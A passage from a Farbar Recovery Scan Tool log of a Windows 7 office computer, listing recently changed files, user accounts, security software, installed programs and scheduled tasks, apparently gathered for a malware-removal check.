2016-10-07 10:12 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-io-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:12 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-handle-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:12 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-fibers-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:12 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-errorhandling-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:12 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-delayload-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:12 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-debug-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:12 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-datetime-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:12 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-console-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:04 - 00148480 _____ (Microsoft Corporation) C:\Windows\system32\appidpolicyconverter.exe 2016-11-09 14:24 - 2016-10-07 10:04 - 00062464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\appid.sys 2016-11-09 14:24 - 2016-10-07 10:04 - 00017920 _____ (Microsoft Corporation) C:\Windows\system32\appidcertstorecheck.exe 2016-11-09 14:24 - 2016-10-07 10:01 - 00338432 _____ (Microsoft Corporation) C:\Windows\system32\conhost.exe 2016-11-09 14:24 - 2016-10-07 10:00 - 00296960 _____ (Microsoft Corporation) C:\Windows\system32\rstrui.exe 2016-11-09 14:24 - 2016-10-07 09:56 - 00112640 _____ (Microsoft Corporation) C:\Windows\system32\smss.exe 2016-11-09 14:24 - 2016-10-07 09:50 - 00025600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\setup16.exe 2016-11-09 14:24 - 2016-10-07 09:50 - 00014336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntvdm64.dll 2016-11-09 14:24 - 2016-10-07 09:50 - 00007680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\instnm.exe 2016-11-09 14:24 - 2016-10-07 09:50 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\user.exe 2016-11-09 14:24 - 2016-10-07 09:49 - 00006144 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-security-base-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 09:49 - 00004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-threadpool-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 09:49 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-xstate-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 09:49 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-util-l1-1-0.dll 2016-11-09 14:24 - 2016-10-05 09:54 - 00090112 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\bowser.sys 2016-11-09 14:24 - 2016-09-15 09:56 - 00041984 _____ (Microsoft Corporation) C:\Windows\system32\UtcResources.dll 2016-11-09 14:24 - 2016-09-13 10:37 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\tzres.dll 2016-11-09 14:24 - 2016-09-13 10:11 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tzres.dll 2016-11-09 14:24 - 2016-09-09 13:20 - 00756736 _____ (Microsoft Corporation) C:\Windows\system32\win32spl.dll 2016-11-09 14:24 - 2016-09-09 13:00 - 00497152 _____ (Microsoft Corporation) C:\Windows\SysWOW64\win32spl.dll 2016-11-09 14:23 - 2016-08-22 11:19 - 01386496 _____ (Microsoft Corporation) C:\Windows\system32\diagtrack.dll 2016-11-09 11:08 - 2016-12-06 05:53 - 00002271 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk 2016-11-09 11:07 - 2016-12-07 03:12 - 00000904 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job 2016-11-09 11:07 - 2016-12-06 16:36 - 00000900 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job 2016-11-09 11:07 - 2016-11-09 11:07 - 01065376 _____ (Google Inc.) C:\Users\Reception\Downloads\ChromeSetup.exe 2016-11-09 11:07 - 2016-11-09 11:07 - 00003900 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA 2016-11-09 11:07 - 2016-11-09 11:07 - 00003648 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore 2016-11-09 11:07 - 2016-11-09 11:07 - 00000000 ____D C:\Program Files (x86)\Google 2016-11-08 16:09 - 2016-12-06 16:34 - 00000988 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\LogMeIn Control Panel.lnk 2016-11-08 16:08 - 2016-11-08 16:08 - 00000000 ____D C:\Users\Reception\AppData\Local\LogMeIn 2016-11-08 16:08 - 2016-10-12 13:31 - 00122400 _____ (LogMeIn, Inc.) C:\Windows\system32\LMIRfsClientNP.dll 2016-11-08 16:08 - 2016-10-12 13:31 - 00107520 _____ (LogMeIn, Inc.) C:\Windows\system32\LMIinit.dll 2016-11-08 16:08 - 2016-01-29 11:53 - 00035328 _____ (LogMeIn, Inc.) C:\Windows\system32\LMIport.dll 2016-11-08 16:08 - 2013-12-10 15:15 - 00107368 _____ (LogMeIn, Inc.) C:\Windows\system32\LMIRfsClientNP.dll.000.bak 2016-11-08 16:08 - 2013-11-05 16:45 - 00072216 _____ (LogMeIn, Inc.) C:\Windows\system32\Drivers\LMIRfsDriver.sys 2016-11-08 16:07 - 2016-11-08 16:09 - 00000000 ____D C:\Program Files (x86)\LogMeIn 2016-11-08 15:48 - 2016-11-08 15:48 - 20489480 _____ C:\Users\Reception\Downloads\LogMeIn.exe ==================== One Month Modified files and folders ======== (If an entry is included in the fixlist, the file/folder will be moved.) 2016-12-07 03:31 - 2014-02-26 12:30 - 00000346 _____ C:\Windows\Tasks\HP Photo Creations Communicator.job 2016-12-07 03:21 - 2011-05-13 11:48 - 00000112 _____ C:\Windows\system32\config\netlogon.ftl 2016-12-07 03:02 - 2013-02-27 07:50 - 00000830 _____ C:\Windows\Tasks\Adobe Flash Player Updater.job 2016-12-07 02:54 - 2011-05-13 16:24 - 00000000 ____D C:\ProgramData\LogMeIn 2016-12-06 16:40 - 2009-07-13 23:45 - 00031904 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0 2016-12-06 16:40 - 2009-07-13 23:45 - 00031904 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0 2016-12-06 16:34 - 2009-07-14 00:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT 2016-12-06 07:47 - 2014-10-23 11:44 - 00192216 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMSwissArmy.sys 2016-12-06 05:28 - 2011-05-13 11:53 - 00000000 ____D C:\Users\Reception 2016-12-06 05:21 - 2009-07-13 22:20 - 00000000 ____D C:\Windows\inf 2016-12-06 05:19 - 2011-05-11 13:31 - 00000000 ____D C:\Intel 2016-12-06 02:40 - 2009-07-13 22:20 - 00000000 ____D C:\Windows\L2Schemas 2016-12-06 02:38 - 2016-08-11 09:57 - 00000000 ____D C:\Program Files (x86)\Slimjet 2016-12-06 02:26 - 2014-10-23 11:44 - 00000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Malware 2016-12-05 12:13 - 2011-05-13 12:20 - 00000000 ____D C:\Users\clayton 2016-12-05 12:11 - 2016-10-12 09:59 - 00000000 ____D C:\Qoobox 2016-12-05 12:11 - 2016-10-12 09:58 - 00000000 ____D C:\Windows\erdnt 2016-12-05 12:11 - 2013-11-15 10:31 - 00000000 ____D C:\Users\blagler 2016-12-05 12:11 - 2013-08-14 15:57 - 00000000 ____D C:\Program Files (x86)\Print Tracker 2016-12-05 12:11 - 2012-02-24 09:18 - 00000000 ____D C:\Users\dcreery 2016-12-05 12:11 - 2011-05-13 11:45 - 00000000 ____D C:\Users\thepclink 2016-12-05 12:11 - 2010-11-21 02:16 - 00000000 ___RD C:\Users\Public\Recorded TV 2016-12-05 12:11 - 2009-07-13 22:20 - 00000000 ____D C:\Windows\security 2016-12-05 12:11 - 2009-07-13 22:20 - 00000000 ____D C:\Windows\registration 2016-12-05 12:09 - 2011-05-13 12:23 - 00000000 __RHD C:\MSOCache 2016-12-02 12:08 - 2015-02-11 16:28 - 00000000 ____D C:\Users\Reception\AppData\Local\CrashDumps 2016-11-14 18:12 - 2009-07-14 00:13 - 00782778 _____ C:\Windows\system32\PerfStringBackup.INI 2016-11-14 07:53 - 2015-11-11 10:58 - 00000000 ____D C:\Program Files (x86)\Backblaze 2016-11-10 15:36 - 2009-07-13 22:20 - 00000000 ____D C:\Windows\system32\NDF 2016-11-10 13:19 - 2009-07-13 22:20 - 00000000 ____D C:\Windows\rescache 2016-11-10 06:56 - 2009-07-13 23:45 - 01637720 _____ C:\Windows\system32\FNTCACHE.DAT 2016-11-09 17:09 - 2013-08-14 02:01 - 00000000 ____D C:\Windows\system32\MRT 2016-11-09 16:57 - 2011-05-11 10:40 - 141011376 ____C (Microsoft Corporation) C:\Windows\system32\MRT.exe 2016-11-09 14:39 - 2011-05-16 08:24 - 00000000 ____D C:\Users\Reception\AppData\Local\Google 2016-11-08 20:22 - 2012-01-04 10:02 - 00000000 ____D C:\Windows\Hewlett-Packard 2016-11-08 16:14 - 2014-10-23 11:44 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware 2016-11-08 16:09 - 2011-05-13 16:24 - 00001024 _____ C:\.rnd 2016-11-08 10:02 - 2013-02-27 07:50 - 00796352 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe 2016-11-08 10:02 - 2013-02-27 07:50 - 00003768 _____ C:\Windows\System32\Tasks\Adobe Flash Player Updater 2016-11-08 10:02 - 2013-02-27 07:50 - 00000000 ____D C:\Windows\system32\Macromed 2016-11-08 10:02 - 2011-07-25 07:38 - 00142528 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl 2016-11-08 10:02 - 2011-05-13 16:09 - 00000000 ____D C:\Windows\SysWOW64\Macromed ==================== Files in the root of some directories ======= 2014-10-23 15:43 - 2014-10-23 15:43 - 0000272 _____ () C:\Users\Reception\AppData\Roaming\.backup.dm 2011-05-13 16:12 - 2011-05-13 16:12 - 0000697 _____ () C:\Users\Reception\AppData\Roaming\ConvAPIPlugin.log 2015-08-07 13:53 - 2015-08-07 13:53 - 0022544 _____ () C:\Users\Reception\AppData\Roaming\UserTile.png 2014-10-24 13:59 - 2014-10-24 13:59 - 0007643 _____ () C:\Users\Reception\AppData\Local\Resmon.ResmonCfg 2016-11-10 14:24 - 2016-07-14 04:09 - 0010240 _____ () C:\Users\Reception\AppData\Local\Z@!-66cdbda3-850e-49fb-bcc4-315e343cf0e0.tmp 2016-11-10 14:24 - 2016-07-14 04:09 - 0009216 _____ () C:\Users\Reception\AppData\Local\Z@S!-41305b6f-9545-4896-8e05-c1bc01799922.tmp 2013-11-11 09:40 - 2013-11-11 09:40 - 0000057 _____ () C:\ProgramData\Ament.ini 2011-05-13 15:07 - 2011-05-13 16:12 - 0003443 _____ () C:\ProgramData\hpzinstall.log ==================== Bamital & volsnap ====================== (There is no automatic fix for files that do not pass verification.) C:\Windows\system32\winlogon.exe => File is digitally signed C:\Windows\system32\wininit.exe => File is digitally signed C:\Windows\SysWOW64\wininit.exe => File is digitally signed C:\Windows\explorer.exe => File is digitally signed C:\Windows\SysWOW64\explorer.exe => File is digitally signed C:\Windows\system32\svchost.exe => File is digitally signed C:\Windows\SysWOW64\svchost.exe => File is digitally signed C:\Windows\system32\services.exe => File is digitally signed C:\Windows\system32\User32.dll => File is digitally signed C:\Windows\SysWOW64\User32.dll => File is digitally signed C:\Windows\system32\userinit.exe => File is digitally signed C:\Windows\SysWOW64\userinit.exe => File is digitally signed C:\Windows\system32\rpcss.dll => File is digitally signed C:\Windows\system32\dnsapi.dll => File is digitally signed C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed LastRegBack: 2016-12-02 04:41 ==================== End of FRST.txt ============================ Additional scan result of Farbar Recovery Scan Tool (x64) Version: 05-12-2016 Ran by Reception (07-12-2016 03:52:14) Running from \\SPARTA\RedirectedFolders\Reception\Desktop Windows 7 Professional Service Pack 1 (X64) (2011-05-13 16:44:56) Boot Mode: Normal ========================================================== ==================== Accounts: ============================= admin (S-1-5-21-1158510682-2263174364-945799988-1001 - Administrator - Enabled) Administrator (S-1-5-21-1158510682-2263174364-945799988-500 - Administrator - Disabled) Guest (S-1-5-21-1158510682-2263174364-945799988-501 - Limited - Disabled) ==================== Security Center ======================== (If an entry is included in the fixlist, it will be removed.) AV: Symantec Endpoint Protection (Enabled - Up to date) {53C7D717-52E2-B95E-FA61-6F32ECC805DB} AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} AS: Symantec Endpoint Protection (Enabled - Up to date) {E8A636F3-74D8-B6D0-C0D1-5440974F4F66} ==================== Installed Programs ====================== (Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.) 64 Bit HP CIO Components Installer (Version: 7.2.8 - Hewlett-Packard) Hidden 6500_E709_eDocs (x32 Version: 1.00.0000 - Hewlett-Packard) Hidden 6500_E709_Help (x32 Version: 1.00.0000 - Hewlett-Packard) Hidden 6500_E709a (x32 Version: 140.0.000.000 - Hewlett-Packard) Hidden 7-Zip 16.02 (HKLM-x32\...\7-Zip) (Version: 16.02 - Igor Pavlov) Adobe Acrobat X Pro (HKLM-x32\...\{AC76BA86-1033-0000-7760-000000000005}) (Version: 10.1.6 - Adobe Systems) Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 2.6.0.19140 - Adobe Systems Incorporated) Adobe Flash Player 23 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 23.0.0.207 - Adobe Systems Incorporated) Adobe Flash Player 23 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 23.0.0.207 - Adobe Systems Incorporated) Adobe Reader X (10.1.9) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AA1000000001}) (Version: 10.1.9 - Adobe Systems Incorporated) Apple Application Support (32-bit) (HKLM-x32\...\{D4B07658-F443-4445-A261-E643996E139D}) (Version: 4.3.2 - Apple Inc.) Apple Application Support (64-bit) (HKLM\...\{A6B0442B-E159-444B-B49D-6B9AC531EAE3}) (Version: 4.3.2 - Apple Inc.) Apple Mobile Device Support (HKLM\...\{2E4AF2A6-50EA-4260-9BA4-5E582D11879A}) (Version: 9.3.0.15 - Apple Inc.) Apple Software Update (HKLM-x32\...\{56EC47AA-5813-4FF6-8E75-544026FBEA83}) (Version: 2.2.0.150 - Apple Inc.) Backblaze (HKLM-x32\...\Backblaze) (Version: - Backblaze, Inc) Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.) bpd_scan (x32 Version: 3.00.0000 - Hewlett-Packard) Hidden BPDSoftware (x32 Version: 140.0.000.000 - Hewlett-Packard) Hidden BPDSoftware_Ini (x32 Version: 1.00.0000 - Hewlett-Packard) Hidden BufferChm (x32 Version: 140.0.213.000 - Hewlett-Packard) Hidden CASIO C781 USB Driver V1.0.4.0 (HKLM-x32\...\{3FA1785D-EED5-4840-A78F-2FC8B663CA86}) (Version: 1.0.4.0 - CASIO) Citrix Online Launcher (HKLM-x32\...\{678753E6-E526-4AE5-A144-00240772543A}) (Version: 1.0.393 - Citrix) CrystalDiskInfo 7.0.4 (HKLM-x32\...\CrystalDiskInfo_is1) (Version: 7.0.4 - Crystal Dew World) CYMA IV Accounting Workstation (HKLM-x32\...\{6F43D45B-4C72-4BB8-9601-BFE282765A38}) (Version: 14.3.0 - CYMA Systems Inc.) CYMA IV Accounting Workstation (x32 Version: 13.0.0 - CYMA Systems Inc.) Hidden CYMA IV Accounting Workstation (x32 Version: 14.0.0 - CYMA Systems Inc.) Hidden DESI Labeling System (HKLM-x32\...\DESI Labeling System 3.8.1.0) (Version: 3.1.10.1 - DESI Telephone Labels, Inc.) DESI Labeling System (Version: 3.8.1.0 - DESI Telephone Labels, Inc.) Hidden Destinations (x32 Version: 130.0.0.0 - Hewlett-Packard) Hidden DeviceDiscovery (x32 Version: 140.0.213.000 - Hewlett-Packard) Hidden DocMgr (x32 Version: 140.0.65.000 - Hewlett-Packard) Hidden DocProc (x32 Version: 140.0.100.000 - Hewlett-Packard) Hidden Fax (x32 Version: 140.0.213.000 - Hewlett-Packard) Hidden FileZilla Server (HKLM-x32\...\FileZilla Server) (Version: beta 0.9.49 - FileZilla Project) FlashPeak Slimjet (HKLM-x32\...\Slimjet) (Version: 10.0.8.0 - FlashPeak Inc.) Google Chrome (HKLM-x32\...\Google Chrome) (Version: 55.0.2883.75 - Google Inc.) Google Update Helper (x32 Version: 1.3.31.5 - Google Inc.) Hidden GoToAssist Corporate (HKLM-x32\...\GoToAssist) (Version: 11.0.0.1019 - Citrix Online, a division of Citrix Systems, Inc.) GoToAssist Customer 2.5.0.888 (HKLM-x32\...\GoToAssist Express Customer) (Version: 2.5.0.888 - Citrix Online) GPBaseService2 (x32 Version: 140.0.212.000 - Hewlett-Packard) Hidden Hewlett-Packard ACLM.NET v1.1.0.0 (x32 Version: 1.00.0000 - Hewlett-Packard) Hidden HP Customer Participation Program 14.0 (HKLM\...\HPExtendedCapabilities) (Version: 14.0 - HP) HP Deskjet 2540 series Basic Device Software (HKLM\...\{BD1EFE20-246B-451F-B900-F1214324DF5F}) (Version: 30.0.1093.41190 - Hewlett-Packard Co.) HP Deskjet 2540 series Help (HKLM-x32\...\{4539575D-C09D-4E71-B207-0F2D6BD74DA2}) (Version: 30.0.0 - Hewlett Packard) HP Document Manager 2.0 (HKLM\...\HP Document Manager) (Version: 2.0 - HP) HP Imaging Device Functions 14.0 (HKLM\...\HP Imaging Device Functions) (Version: 14.0 - HP) HP Officejet 6500 E709 Series (HKLM\...\{58D79E62-CFC8-4331-8469-3A1B16E1769C}) (Version: 14.0 - HP) HP Officejet Pro 8610 Basic Device Software (HKLM\...\{39DA3F40-0B9E-4002-8E01-108FEC9EFE43}) (Version: 32.3.198.49673 - Hewlett-Packard Co.) HP Officejet Pro 8610 Help (HKLM-x32\...\{F9569D00-4576-46C8-B6C7-207A4FD39745}) (Version: 32.0.0 - Hewlett Packard) HP Photo Creations (HKLM-x32\...\HP Photo Creations) (Version: 1.0.0.12992 - HP) HP Product Detection (HKLM-x32\...\{A436F67F-687E-4736-BD2B-537121A804CF}) (Version: 11.14.0001 - HP) HP Smart Web Printing 4.60 (HKLM\...\HP Smart Web Printing) (Version: 4.60 - HP) HP Solution Center 14.0 (HKLM\...\HP Solution Center & Imaging Support Tools) (Version: 14.0 - HP) HP Update (HKLM-x32\...\{912D30CF-F39E-4B31-AD9A-123C6B794EE2}) (Version: 5.005.002.002 - Hewlett-Packard) HPDiagnosticAlert (x32 Version: 1.00.0000 - Microsoft) Hidden HPProductAssistant (x32 Version: 140.0.213.000 - Hewlett-Packard) Hidden HPSSupply (x32 Version: 140.0.212.000 - Hewlett-Packard) Hidden I.R.I.S. OCR (HKLM-x32\...\{CA6BCA2F-EDEB-408F-850B-31404BE16A61}) (Version: 12.3.4.0 - HP) iCloud (HKLM\...\{724A887F-2B55-4306-B6F9-8F0E7A04B1B5}) (Version: 5.2.2.87 - Apple Inc.) Intel(R) Graphics Media Accelerator Driver (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 8.15.10.2869 - Intel Corporation) iTunes (HKLM\...\{955524E7-79EB-4CA9-BA4D-FD2DF587651B}) (Version: 12.4.3.1 - Apple Inc.) join.me (HKU\S-1-5-21-3320201264-2921037059-4171379232-1192\...\JoinMe) (Version: 1.9.1.204 - LogMeIn, Inc.) Logitech Unifying Software 1.00 (HKLM\...\Logitech Unifying) (Version: 1.00.127 - Logitech) LogMeIn (HKLM-x32\...\{F099EA75-A298-4A13-93CB-D2446436B137}) (Version: 4.1.3888 - LogMeIn, Inc.) Malwarebytes Anti-Malware version 2.2.1.1043 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.1.1043 - Malwarebytes) MarketResearch (x32 Version: 140.0.214.000 - Hewlett-Packard) Hidden Microsoft .NET Framework 4.6.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.6.01055 - Microsoft Corporation) Microsoft IntelliType Pro 8.2 (HKLM\...\Microsoft IntelliType Pro 8.2) (Version: 8.20.469.0 - Microsoft Corporation) Microsoft Office Professional 2010 (HKLM-x32\...\Office14.SingleImage) (Version: 14.0.7015.1000 - Microsoft Corporation) Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50901.0 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{A49F249F-0C91-497F-86DF-B2585E8E76B7}) (Version: 8.0.50727.42 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation) MS Word Employment Application Template Software (HKLM-x32\...\MS Word Employment Application Template Software_is1) (Version: - Sobolsoft) MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation) MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation) MSXML 4.0 SP2 Parser and SDK (HKLM-x32\...\{716E0306-8318-4364-8B8F-0CC4E9376BAC}) (Version: 4.20.9818.0 - Microsoft Corporation) Network64 (Version: 140.0.215.000 - Hewlett-Packard) Hidden Network64 (Version: 140.0.221.000 - Hewlett-Packard) Hidden OCR Software by I.R.I.S. 14.0 (HKLM\...\HPOCR) (Version: 14.0 - HP) Pervasive PSQL v10 SP3 Workgroup (32-bit) (HKLM-x32\...\Pervasive PSQL v10 SP3 Workgroup (32-bit)) (Version: 10.30.024 - Pervasive Software) Pervasive PSQL v10 SP3 Workgroup (32-bit) (x32 Version: 10.30.024 - Pervasive Software) Hidden Print Tracker (HKLM-x32\...\Print Tracker_is1) (Version: - Really Impressive Products, LLC) Product Improvement Study for HP Deskjet 2540 series (HKLM\...\{2302D958-4F1E-469A-8A90-15C321320C71}) (Version: 30.0.1093.41190 - Hewlett-Packard Co.) Product Improvement Study for HP Officejet Pro 8610 (HKLM\...\{D2064264-3162-4DB1-AFE0-167BEFBBCD9C}) (Version: 32.3.198.49673 - Hewlett-Packard Co.) ProductContext (x32 Version: 140.0.000.000 - Hewlett-Packard) Hidden Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.5841 - Realtek Semiconductor Corp.) Roadkil's CommTest Version 1.3 (HKLM-x32\...\{DB6A986B-CCF7-4041-81ED-80EB2C106CC5}_is1) (Version: - Roadkil.Net) Scan (x32 Version: 140.0.167.000 - Hewlett-Packard) Hidden Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{DE28B448-32E8-4E8F-84F0-A52B21A49B5B}) (Version: - Microsoft) Shop for HP Supplies (HKLM\...\Shop for HP Supplies) (Version: 14.0 - HP) SmartWebPrinting (x32 Version: 140.0.213.000 - Hewlett-Packard) Hidden Smilebox (HKU\S-1-5-21-3320201264-2921037059-4171379232-1192\...\Smilebox) (Version: - ) SolutionCenter (x32 Version: 140.0.214.000 - Hewlett-Packard) Hidden Status (x32 Version: 140.0.256.000 - Hewlett-Packard) Hidden Symantec Endpoint Protection (HKLM\...\{827E3EA6-85D1-4413-96D8-24B0F9B49967}) (Version: 12.1.4112.4156 - Symantec Corporation) The Print Shop 2.0 Professional (HKLM-x32\...\{159E3ACF-7D79-49A1-A085-9F53B0738C65}) (Version: 2.00.0000 - Encore) The Print Shop 3.0 Deluxe (HKLM-x32\...\{A5154F2B-09F9-40A3-8CA5-B581CA9766C5}) (Version: 1.00.0000 - Encore Software, Inc.) The Print Shop 3.0 Fonts (HKLM-x32\...\{2C3060F6-F0DC-4F63-A70F-2070BE57EEDC}) (Version: 1.0 - Encore) The Print Shop 3.5 Fonts (HKLM-x32\...\{B6D7C4E3-27FB-4937-B1F3-9B26C5D2A65A}) (Version: 1.0 - Encore) The Print Shop 3.5 Professional (HKLM-x32\...\{54BBB71F-59C7-4F1B-B08A-7908D4ED3A2B}) (Version: 1.00.0000 - Encore) Toolbox (x32 Version: 140.0.428.000 - Hewlett-Packard) Hidden TrayApp (x32 Version: 140.0.213.000 - Hewlett-Packard) Hidden Trend Micro Worry-Free Business Security Agent (x32 Version: 1.0.0 - Trend Micro Incorporated) Hidden WebReg (x32 Version: 140.0.213.017 - Hewlett-Packard) Hidden Windows Live ID Sign-in Assistant (HKLM\...\{9B48B0AC-C813-4174-9042-476A887592C7}) (Version: 6.500.3165.0 - Microsoft Corporation) Windows Media Player Firefox Plugin (HKLM-x32\...\{69FDFBB6-351D-4B8C-89D8-867DC9D0A2A4}) (Version: 1.0.0.8 - Microsoft Corp) Windows Small Business Server 2008 ClientAgent (HKLM\...\{E4FF4DF1-F99C-49AC-B398-BE0887432846}) (Version: 6.0.5601.0 - Microsoft Corporation) Windows Small Business Server 2008 Desktop Links Gadget (HKLM\...\{F5E5D7CA-0F94-41A3-8106-66473C2F3728}) (Version: 6.0.5601.0 - Microsoft Corporation) WordPerfect Office X3 (HKLM-x32\...\_{83FBD495-DDF6-4C8D-92D6-10261DD6F6A3}) (Version: - Corel Corporation) WordPerfect Office X3 (x32 Version: 13.3 - Corel Corporation) Hidden ==================== Custom CLSID (Whitelisted): ========================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) CustomCLSID: HKU\S-1-5-21-3320201264-2921037059-4171379232-1192_Classes\CLSID\{355EC88A-02E2-4547-9DEE-F87426484BD1}\InprocServer32 -> C:\Users\Reception\AppData\Local\Google\Update\1.3.23.9\psuser_64.dll => No File CustomCLSID: HKU\S-1-5-21-3320201264-2921037059-4171379232-1192_Classes\CLSID\{90B3DFBF-AF6A-4EA0-8899-F332194690F8}\InprocServer32 -> C:\Users\Reception\AppData\Local\Google\Update\1.3.24.15\psuser_64.dll => No File CustomCLSID: HKU\S-1-5-21-3320201264-2921037059-4171379232-1192_Classes\CLSID\{FE498BAB-CB4C-4F88-AC3F-3641AAAF5E9E}\InprocServer32 -> C:\Users\Reception\AppData\Local\Google\Update\1.3.24.7\psuser_64.dll => No File ==================== Scheduled Tasks (Whitelisted) ============= (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) Task: {245CD879-2842-422F-867B-DA8E3DF4B8EA} - System32\Tasks\HPCustParticipation HP Officejet Pro 8610 => C:\Program Files\HP\HP Officejet Pro 8610\Bin\HPCustPartic.exe [2014-07-21] (Hewlett-Packard Development Company, LP) Task: {382A1033-1434-4011-8A0A-528FE84E942A} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-11-09] (Google Inc.) Task: {6AFD2FFF-BB51-4CE5-998A-D02855A23969} - System32\Tasks\{3F506071-F11E-4C0B-96B7-E75E0CE71562} => C:\Program Files (x86)\The Print Shop 2.0 Professional\PsLaunch.exe [2010-08-02] () Task: {6F7B3DA7-5C81-42D1-AAD4-E18FCF6E683E} - System32\Tasks\{C8E68830-7E17-4851-AABF-7A4BDB33E408} => pcalua.exe -a "C:\Program 